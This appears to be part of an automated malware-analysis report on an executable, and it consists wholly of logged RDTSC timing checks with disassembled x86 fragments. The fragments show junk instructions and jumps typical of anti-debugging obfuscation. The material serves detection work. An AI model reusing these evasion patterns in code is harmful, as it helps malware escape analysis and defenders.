Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D8DF4 second address: 15D8E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F19CCBA87B8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 sub dword ptr [ebp+1247D5DEh], ecx 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F19CCBA87B8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 jbe 00007F19CCBA87B6h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D92C3 second address: 15D92C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D92C9 second address: 15D92D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D93B6 second address: 15D93BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D93BB second address: 15D93C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D95D2 second address: 15D95D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D9695 second address: 15B8BD6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F19CCBA87B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e cmc 0x0000000f mov edi, dword ptr [ebp+122D394Bh] 0x00000015 call dword ptr [ebp+122D36A3h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15B8BD6 second address: 15B8BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F19CD112F7Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1609B9D second address: 1609BBD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F19CCBA87C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F19CCBA87BEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160A01A second address: 160A052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F19CD112F66h 0x00000010 jmp 00007F19CD112F76h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160A052 second address: 160A058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160A490 second address: 160A496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160A496 second address: 160A4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CCBA87C2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160A4AD second address: 160A4B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160A4B3 second address: 160A4B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160EB39 second address: 160EB3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160EB3F second address: 160EB65 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F19CCBA87CDh 0x00000008 jmp 00007F19CCBA87C1h 0x0000000d ja 00007F19CCBA87B6h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16144CA second address: 16144D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16144D0 second address: 16144D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16144D6 second address: 16144DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16144DC second address: 16144E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 161348B second address: 16134A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F73h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1613771 second address: 1613790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C9h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1613790 second address: 16137A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16137A0 second address: 16137A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16137A4 second address: 16137B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F19CD112F6Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16137B7 second address: 16137EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F19CCBA87C8h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16137EB second address: 1613810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F19CD112F66h 0x0000000c jmp 00007F19CD112F78h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1613810 second address: 161381A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F19CCBA87BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1613EEC second address: 1613EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1613EFA second address: 1613EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1613EFF second address: 1613F13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F19CD112F6Ch 0x00000008 jno 00007F19CD112F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1613F13 second address: 1613F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1613F1B second address: 1613F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1613F23 second address: 1613F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F19CCBA87B6h 0x0000000a popad 0x0000000b jmp 00007F19CCBA87BBh 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16141BF second address: 16141EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F19CD112F66h 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F19CD112F66h 0x00000012 popad 0x00000013 jnl 00007F19CD112F7Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1618E24 second address: 1618E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1619251 second address: 1619257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1619257 second address: 161925B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16194DB second address: 16194E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16194E1 second address: 1619504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F19CCBA87B6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1619504 second address: 1619510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F19CD112F66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1619685 second address: 1619693 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F19CCBA87B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1619822 second address: 1619826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 161A160 second address: 161A17B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CCBA87C5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1618B66 second address: 1618B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CD112F79h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1618B88 second address: 1618B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1618B8C second address: 1618B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F19CD112F66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1598298 second address: 159829C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16222D1 second address: 16222D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1622554 second address: 1622565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F19CCBA87B8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1624DA7 second address: 1624DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1624A79 second address: 1624A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CCBA87C0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1624A8D second address: 1624AB1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F19CD112F66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F19CD112F80h 0x00000014 jmp 00007F19CD112F6Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1624AB1 second address: 1624AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162A8EE second address: 162A8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162A8F3 second address: 162A8F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162A8F9 second address: 162A8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D8FE4 second address: 15D8FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D8FE8 second address: 15D8FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D8FEC second address: 15D9077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F19CCBA87BFh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f ja 00007F19CCBA87C5h 0x00000015 mov ebx, dword ptr [ebp+1248C125h] 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F19CCBA87B8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D35E2h], edi 0x0000003b add eax, ebx 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F19CCBA87B8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov ecx, dword ptr [ebp+122D3416h] 0x0000005d mov cx, 4E56h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 pop eax 0x00000068 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D9077 second address: 15D907D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D907D second address: 15D909A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CCBA87C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D909A second address: 15D9124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F19CD112F68h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a movzx edi, dx 0x0000002d nop 0x0000002e jmp 00007F19CD112F79h 0x00000033 push eax 0x00000034 pushad 0x00000035 pushad 0x00000036 jmp 00007F19CD112F71h 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d popad 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F19CD112F77h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162AD82 second address: 162AD88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162AD88 second address: 162AD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162AD8E second address: 162AD9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F19CCBA87B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162AD9A second address: 162AD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162AD9E second address: 162ADA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162B75F second address: 162B765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162B765 second address: 162B769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162B769 second address: 162B78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F19CD112F71h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jo 00007F19CD112F66h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 158C62C second address: 158C64D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F19CCBA87B6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F19CCBA87C3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162F876 second address: 162F890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F19CD112F73h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 162F890 second address: 162F8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F19CCBA87BAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163332A second address: 1633336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F19CD112F68h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1633336 second address: 1633340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1633340 second address: 1633367 instructions: 0x00000000 rdtsc 0x00000002 je 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F19CD112F93h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F19CD112F73h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16334E2 second address: 16334EE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F19CCBA87B6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16334EE second address: 16334F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16334F4 second address: 16334FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16334FA second address: 16334FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16334FE second address: 163352C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F19CCBA87C1h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F19CCBA87BDh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163352C second address: 1633552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CD112F6Eh 0x00000009 popad 0x0000000a jmp 00007F19CD112F6Ah 0x0000000f pushad 0x00000010 jo 00007F19CD112F66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163DADA second address: 163DAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163DAE0 second address: 163DB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CD112F74h 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007F19CD112F66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163DB02 second address: 163DB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163BD68 second address: 163BD6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163BD6C second address: 163BD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163D220 second address: 163D234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F19CD112F6Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163F0A6 second address: 163F0AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
